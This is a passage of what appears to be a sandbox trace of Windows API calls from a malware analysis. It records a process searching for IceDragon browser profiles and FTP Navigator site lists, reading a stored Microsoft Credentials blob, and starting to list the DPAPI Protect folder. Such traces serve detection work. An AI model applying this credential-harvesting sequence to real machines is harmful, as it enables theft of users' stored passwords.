lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\profiles.ini", lpFilePart=0x0) returned 0x43 [0182.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0182.416] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\comodo\\icedragon\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0182.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0182.420] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\profiles.ini", lpFilePart=0x0) returned 0x43 [0182.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0182.420] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\comodo\\icedragon\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0182.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0182.470] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x19ef28, nSize=0x80 | out: lpBuffer="") returned 0x2 [0182.473] GetFullPathNameW (in: lpFileName="C:\\FTP Navigator\\Ftplist.txt", nBufferLength=0x105, lpBuffer=0x19ea00, lpFilePart=0x0 | out: lpBuffer="C:\\FTP Navigator\\Ftplist.txt", lpFilePart=0x0) returned 0x1c [0182.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef38) returned 1 [0182.473] CreateFileW (lpFileName="C:\\FTP Navigator\\Ftplist.txt" (normalized: "c:\\ftp navigator\\ftplist.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0182.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0182.521] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.521] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0182.521] CoTaskMemFree (pv=0x5b20c8) [0182.521] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0182.523] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\", nBufferLength=0x105, lpBuffer=0x19eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\", lpFilePart=0x0) returned 0x3a [0182.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efd8) returned 1 [0182.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials"), fInfoLevelId=0x0, lpFileInformation=0x19f054 | out: lpFileInformation=0x19f054*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efd4) returned 1 [0182.523] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.523] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0182.524] CoTaskMemFree (pv=0x5b20c8) [0182.524] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0182.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f058) returned 1 [0182.524] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\", nBufferLength=0x105, lpBuffer=0x19eb18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\", lpFilePart=0x0) returned 0x3a [0182.524] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x580d80 [0182.525] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb51b0, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fb51b0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.526] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0182.526] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.526] FindClose (in: hFindFile=0x580d80 | out: hFindFile=0x580d80) returned 1 [0182.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f014) returned 1 [0182.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f020) returned 1 [0182.528] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.528] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0182.528] CoTaskMemFree (pv=0x5b20c8) [0182.528] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0182.528] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\", nBufferLength=0x105, lpBuffer=0x19eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\", lpFilePart=0x0) returned 0x3c [0182.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efd8) returned 1 [0182.528] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials"), fInfoLevelId=0x0, lpFileInformation=0x19f054 | out: lpFileInformation=0x19f054*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efd4) returned 1 [0182.528] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.528] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0182.528] CoTaskMemFree (pv=0x5b20c8) [0182.529] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0182.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f058) returned 1 [0182.529] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\", nBufferLength=0x105, lpBuffer=0x19eb18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\", lpFilePart=0x0) returned 0x3c [0182.529] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x580d80 [0182.529] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.529] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0182.529] FindClose (in: hFindFile=0x580d80 | out: hFindFile=0x580d80) returned 1 [0182.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f014) returned 1 [0182.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f020) returned 1 [0182.579] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", nBufferLength=0x105, lpBuffer=0x19eaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpFilePart=0x0) returned 0x5a [0182.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef94) returned 1 [0182.579] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), fInfoLevelId=0x0, lpFileInformation=0x2349250 | out: lpFileInformation=0x2349250*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0)) returned 1 [0182.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef90) returned 1 [0182.580] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", nBufferLength=0x105, lpBuffer=0x19e9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpFilePart=0x0) returned 0x5a [0182.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eed8) returned 1 [0182.580] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4dc [0182.581] GetFileType (hFile=0x4dc) returned 0x1 [0182.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eed4) returned 1 [0182.581] GetFileType (hFile=0x4dc) returned 0x1 [0182.581] GetFileSize (in: hFile=0x4dc, lpFileSizeHigh=0x19efd4 | out: lpFileSizeHigh=0x19efd4*=0x0) returned 0x2ac0 [0182.581] ReadFile (in: hFile=0x4dc, lpBuffer=0x2349518, nNumberOfBytesToRead=0x2ac0, lpNumberOfBytesRead=0x19ef80, lpOverlapped=0x0 | out: lpBuffer=0x2349518*, lpNumberOfBytesRead=0x19ef80*=0x2ac0, lpOverlapped=0x0) returned 1 [0182.583] CloseHandle (hObject=0x4dc) returned 1 [0182.643] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", nBufferLength=0x105, lpBuffer=0x19ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpFilePart=0x0) returned 0x5a [0182.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef64) returned 1 [0182.643] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), fInfoLevelId=0x0, lpFileInformation=0x19efe0 | out: lpFileInformation=0x19efe0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0)) returned 1 [0182.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef60) returned 1 [0182.644] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x19ecb4 | out: pTimeZoneInformation=0x19ecb4) returned 0x2 [0182.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ed98 | out: phkResult=0x19ed98*=0x4dc) returned 0x0 [0182.646] RegQueryValueExW (in: hKey=0x4dc, lpValueName="TZI", lpReserved=0x0, lpType=0x19edb4, lpData=0x0, lpcbData=0x19edb0*=0x0 | out: lpType=0x19edb4*=0x3, lpData=0x0, lpcbData=0x19edb0*=0x2c) returned 0x0 [0182.646] RegQueryValueExW (in: hKey=0x4dc, lpValueName="TZI", lpReserved=0x0, lpType=0x19edb4, lpData=0x234eb9c, lpcbData=0x19edb0*=0x2c | out: lpType=0x19edb4*=0x3, lpData=0x234eb9c*, lpcbData=0x19edb0*=0x2c) returned 0x0 [0182.646] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ebec | out: phkResult=0x19ebec*=0x0) returned 0x2 [0182.647] RegQueryValueExW (in: hKey=0x4dc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19ed8c, lpData=0x0, lpcbData=0x19ed88*=0x0 | out: lpType=0x19ed8c*=0x1, lpData=0x0, lpcbData=0x19ed88*=0x20) returned 0x0 [0182.647] RegQueryValueExW (in: hKey=0x4dc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19ed8c, lpData=0x234efc0, lpcbData=0x19ed88*=0x20 | out: lpType=0x19ed8c*=0x1, lpData="@tzres.dll,-320", lpcbData=0x19ed88*=0x20) returned 0x0 [0182.647] RegQueryValueExW (in: hKey=0x4dc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19ed8c, lpData=0x0, lpcbData=0x19ed88*=0x0 | out: lpType=0x19ed8c*=0x1, lpData=0x0, lpcbData=0x19ed88*=0x20) returned 0x0 [0182.647] RegQueryValueExW (in: hKey=0x4dc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19ed8c, lpData=0x234f018, lpcbData=0x19ed88*=0x20 | out: lpType=0x19ed8c*=0x1, lpData="@tzres.dll,-322", lpcbData=0x19ed88*=0x20) returned 0x0 [0182.647] RegQueryValueExW (in: hKey=0x4dc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19ed8c, lpData=0x0, lpcbData=0x19ed88*=0x0 | out: lpType=0x19ed8c*=0x1, lpData=0x0, lpcbData=0x19ed88*=0x20) returned 0x0 [0182.647] RegQueryValueExW (in: hKey=0x4dc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19ed8c, lpData=0x234f070, lpcbData=0x19ed88*=0x20 | out: lpType=0x19ed8c*=0x1, lpData="@tzres.dll,-321", lpcbData=0x19ed88*=0x20) returned 0x0 [0182.648] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.648] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0182.649] CoTaskMemFree (pv=0x5b20c8) [0182.649] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.649] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19eda8, pwszFileMUIPath=0x5b20c8, pcchFileMUIPath=0x19edac, pululEnumerator=0x19eda0 | out: pwszLanguage=0x0, pcchLanguage=0x19eda8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19edac, pululEnumerator=0x19eda0) returned 1 [0182.654] CoTaskMemFree (pv=0x0) [0182.654] CoTaskMemFree (pv=0x5b20c8) [0182.655] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5140001 [0182.668] CoTaskMemAlloc (cb=0x3ec) returned 0x5d07f8 [0182.668] LoadStringW (in: hInstance=0x5140001, uID=0x140, lpBuffer=0x5d07f8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0182.668] CoTaskMemFree (pv=0x5d07f8) [0182.669] FreeLibrary (hLibModule=0x5140001) returned 1 [0182.670] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.670] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0182.670] CoTaskMemFree (pv=0x5b20c8) [0182.670] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.670] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19eda8, pwszFileMUIPath=0x5b20c8, pcchFileMUIPath=0x19edac, pululEnumerator=0x19eda0 | out: pwszLanguage=0x0, pcchLanguage=0x19eda8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19edac, pululEnumerator=0x19eda0) returned 1 [0182.673] CoTaskMemFree (pv=0x0) [0182.673] CoTaskMemFree (pv=0x5b20c8) [0182.673] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5140001 [0182.677] CoTaskMemAlloc (cb=0x3ec) returned 0x5d07f8 [0182.677] LoadStringW (in: hInstance=0x5140001, uID=0x142, lpBuffer=0x5d07f8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0182.678] CoTaskMemFree (pv=0x5d07f8) [0182.678] FreeLibrary (hLibModule=0x5140001) returned 1 [0182.678] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.678] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0182.679] CoTaskMemFree (pv=0x5b20c8) [0182.679] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.679] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19eda8, pwszFileMUIPath=0x5b20c8, pcchFileMUIPath=0x19edac, pululEnumerator=0x19eda0 | out: pwszLanguage=0x0, pcchLanguage=0x19eda8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19edac, pululEnumerator=0x19eda0) returned 1 [0182.682] CoTaskMemFree (pv=0x0) [0182.682] CoTaskMemFree (pv=0x5b20c8) [0182.682] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5140001 [0182.685] CoTaskMemAlloc (cb=0x3ec) returned 0x5d07f8 [0182.685] LoadStringW (in: hInstance=0x5140001, uID=0x141, lpBuffer=0x5d07f8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0182.685] CoTaskMemFree (pv=0x5d07f8) [0182.685] FreeLibrary (hLibModule=0x5140001) returned 1 [0182.686] RegCloseKey (hKey=0x4dc) returned 0x0 [0182.687] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", nBufferLength=0x105, lpBuffer=0x19ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpFilePart=0x0) returned 0x5a [0182.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef64) returned 1 [0182.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), fInfoLevelId=0x0, lpFileInformation=0x19efe0 | out: lpFileInformation=0x19efe0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x82fb3e5e, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x82fba0be, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0)) returned 1 [0182.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef60) returned 1 [0182.724] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0182.724] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0182.724] CoTaskMemFree (pv=0x5b20c8) [0182.724] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0182.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f058) returned 1 [0182.726] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\", nBufferLength=0x105, lpBuffer=0x19eb18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\", lpFilePart=0x0) returned 0x38 [0182.726] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\*"), lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 